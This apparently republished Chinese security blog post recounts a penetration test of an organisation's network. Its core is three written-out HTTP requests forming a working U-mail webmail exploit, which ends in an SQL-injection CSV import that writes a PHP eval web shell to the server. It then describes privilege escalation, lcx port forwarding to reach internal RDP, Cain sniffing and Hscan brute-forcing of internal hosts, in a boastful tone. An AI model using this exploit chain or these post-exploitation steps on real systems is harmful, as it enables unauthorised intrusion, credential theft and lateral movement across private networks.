FavoriteLoading
0

記得一次艱難的內網漫游

因為這個站是一次滲透測試項目的站,所以全程打馬賽克,請各位見諒。

首先呢我看了下這個站主站沒什么漏洞,也可以說我這個菜鳥啥都不會找不到漏洞吧。主站是個精良南方明顯打過補丁的啥希望都沒了,  我們領導是讓我給他搞個能進OA系統的管理員賬戶,于是我就看了下OA。結果讓我感到無奈啊,  這特么的是泛微CMS挺蛋疼的,你說我要是有一枚地下0day該有多好。 

這真的挺蛋疼的百度上找了好多關于泛微CMS的漏洞沒一個能用的,最后一點希望也破滅了。 

無奈最后掃了下子域名發現了一個郵箱系統!居然是U-mail的CMS感覺很脆的樣子,我就到烏云上面找了幾篇關于U-mail的前臺GETShell方法。恩就是只要三個步驟的那個。 

具體GETShell操作如下:

第一步,獲得物理路徑請求

GET /webmail/client/mail/module/test.php HTTP/1.1

Host: **.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

第二步,請求為,響應中獲得PHPSESSID

POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1

Host: **.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 30

[email protected]**.**.**.**&link=?


第三步,將PHPSESSID和路徑寫入如下請求,執行getshell EXP即可

POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1

Host: **.**.**.**

Proxy-Connection: keep-alive

Content-Length: 553

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://**.**.**.**

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_file"; filename="getshell.csv"

Content-Type: application/vnd.ms-excel

??,μ?×óóê?tμ??·

hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_group"

10

------WebKitFormBoundary69fA5vmkAMLB8gmA

Content-Disposition: form-data; name="import_mode"

ignore

------WebKitFormBoundary69fA5vmkAMLB8gmA--

        因為我也比較懶就沒截這么多張圖了具體看不懂的同學可以到某云的bugs/wooyun-2015-093049/這個地址看大牛怎么操作。只知道能GETShell就行了。

原本以為拿到Shell鏈接數據庫就算大工告成了,結果沒想到的是他把其他網站放在了內網其他的機器上面,這下就麻煩了難怪我搞了半天沒找到OA系統的目錄。出于無奈于是我就提權試下,結果還真是尷尬了。3389都開在內網。

出于無奈只好上傳個lcx來轉發端口,可笑的是我轉發一下午沒轉發出來……后來讓我朋友看下,他說我服務器接收不到轉發的數據。那就算了換一臺服務器搞,結果還真是轉發出來了。

        端口轉發應該就不用解釋了,玩過的同學都應該知道怎么整的。

執行完這兩步驟就可以鏈接127.0.0.1然后我轉發的端口是6677我就連接了127.0.0.1:6677。

我的天吶真是久違的一幕,我真是太愛你了。好了話不多說直接上去干。我先是在服務器上面傳了個Cain嗅探工具你懂得嘻嘻~不過可悲的是我嗅探了一下午

都沒嗅探到東西,后來想想我知道了估計人家下班了我日。無奈我就穿了個Hscan上去爆破但愿有戲吧。

結果真沒讓我失望!真的爆破到了好多內網機器。

其他的就不多說了上去就是干,一句話不和就是日他。 

【聲明】:8090安全小組門戶(http://www.jvwkvg.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。